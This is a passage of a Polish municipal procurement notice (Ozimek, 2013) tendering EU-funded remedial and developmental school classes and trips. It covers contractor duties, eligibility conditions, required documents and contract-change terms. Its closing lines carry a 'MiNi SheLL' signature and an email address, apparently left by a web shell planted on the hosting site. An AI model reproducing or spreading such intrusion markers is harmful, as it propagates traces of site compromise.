24)	przestrzegania przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100, poz. 1024), 

7.	W ramach sprawowania opieki podczas wyjazdów edukacyjnych Wykonawca jest zobowiązany do:
1)	sprawowania opieki nad uczniami w zakresie higieny, zdrowia, wyżywienia oraz innych czynności opiekuńczych, 
2)	zapewnienie bezpieczeństwa uczniom oraz prowadzenie innych zadań zleconych przez organizatora wycieczki
3)	sprawdzania stanu liczbowego uczniów przed wyruszeniem z każdego miejsca pobytu oraz po przybyciu do punktu docelowego
4)	współpracy z osobą prowadzącą zajęcia, w ramach których organizowany jest wyjazd, dyrektorem szkoły podstawowej, koordynatorem szkolnym, kierownikiem projektu i jego zastępcą,

8.	Wykonawca ponosi pełną odpowiedzialność za:
1)	bezpieczeństwo uczniów w czasie trwania zajęć
2)	bezpieczeństwo uczniów podczas  wyjazdów edukacyjnych, 
3)	jakość i terminowość prowadzonych zajęć, 
4)	szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy,
5)	wykorzystanie materiałów dydaktycznych zakupionych przez Zamawiającego,                      w ramach projektu zgodnie z ich przeznaczeniem oraz dbałość o ich należyty stan, 
6)	należyte utrzymanie stanu nieodpłatnie udostępnionych przed Dyrektora Szkoły pracowni-sali, w której będą prowadzone zajęcia oraz użyczonego do prowadzenia zajęć sprzętu. 

9.	Jednej godzinie:
a)	zajęć dydaktyczno-wyrównawczych oraz rozwijających uzdolnienia odpowiada        czasowo - 45 minut.
b)	zajęć specjalistycznych (tj, wymienionych w cz. 16, 29, 39, 49, 50, 59, i 60) odpowiada czasowo - 60 minut
c)	opieki podczas wyjazdów odpowiada czasowo - 60 minut.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających na zasadach określonych w art. 67 ust. 1 pkt 6 Ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych - do 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 62.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku, ponieważ nie ma on zastosowania w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku w sposób szczególny. 
Zamawiający oceni ww. warunek na podstawie oświadczenia - załącznik nr 1 do oferty
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku w sposób szczególny. 
Zamawiający oceni ww. warunek na podstawie oświadczenia - załącznik nr 1 do oferty
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla każdej z części: 1, 2, 3, 4, 5, 6, 11, 12, 13, 14, 15, 16, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60:
warunek uznany zostanie za spełniony jeśli Wykonawca: wykaże, że dysponuje osobą posiadającą/posiada co najmniej stopień nauczyciela kontraktowego oraz kwalifikacje do prowadzenia poszczególnych zajęć wymienionych w rozdziale III SIWZ wynikające z Rozporządzenia Ministra Edukacji Narodowej z dnia 12.03.2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli uprawniające do nauczania wczesnoszkolnego (Dz. U. 2009 nr 50 poz. 400). 
Zamawiający oceni ww. warunek na podstawie oświadczenia - załącznik nr 4 do oferty.
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia
dla każdej z części: 7, 8, 9, 10, 17, 18, 19, 20, 21, 22, 23, 24, 43, 44, 45, 46, 61, 62:
Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku w sposób szczególny. 
Zamawiający oceni ww. warunek na podstawie oświadczenia - załącznik nr 1 do oferty.
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełnienia przedmiotowego warunku w sposób szczególny. 
Zamawiający oceni ww. warunek na podstawie oświadczenia - załącznik nr 1 do oferty
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto obok dokumentów potwierdzających spełnienie warunków udziału w postępowaniu Wykonawca składa:
1)ofertę, wg wzoru oferty, stanowiącego część II SIWZ;
2)dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, a podpisywana jest przez pełnomocnika. 
Inne dokumenty jakie należy dostarczyć przed podpisaniem umowy:
1)kserokopie (potwierdzone za zgodność z oryginałem przez Wykonawcę) dokumentów potwierdzających, że osoby realizujące zajęcia w ramach projektu posiadają kwalifikacje do prowadzenia poszczególnych zajęć.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w szczególności wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:
1)	zmiany osoby prowadzącej zajęcia, jednak z zastrzeżeniem, że osoba realizująca zajęcia w ramach zastępstwa  winna posiadać kwalifikacje określone dla danego typu zajęć lub warsztatów,
2)	zmiany liczby godzin zajęć,
3)	zmiany liczby dzieci biorących udział w projekcie,
4)	zmiany terminów organizowanych wyjazdów edukacyjnych 
5)	zmiana wynagrodzenia, w przypadku ustawowej zmiany przepisów,
6)	termin realizacji:
w przypadku wystąpienia sytuacji niemożliwej do przewidzenia w chwili zawarcia umowy, a mającej wpływ na jej realizację
wstrzymania zajęć, z przyczyn niezależnych od Wykonawcy, przez uprawniony organ
2.	Warunkiem zmiany umowy będzie udokumentowany lub odpowiednio uzasadniony wniosek Stron umowy, a zmiana może nastąpić w przypadku, gdy jej wprowadzenie jest konieczne dla prawidłowej realizacji zamówienia, a druga Strona umowy wyrazi zgodę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ozimek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta
46 - 040 Ozimek
ul. ks. Jana Dzierżona 4 B
pok.100 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2013 godzina 10:00, miejsce: Urząd Gminy i Miasta
46 - 040 Ozimek
ul. ks. Jana Dzierżona 4 B
BIURO PODAWCZE (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 2.	Projekt współfinansowany jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com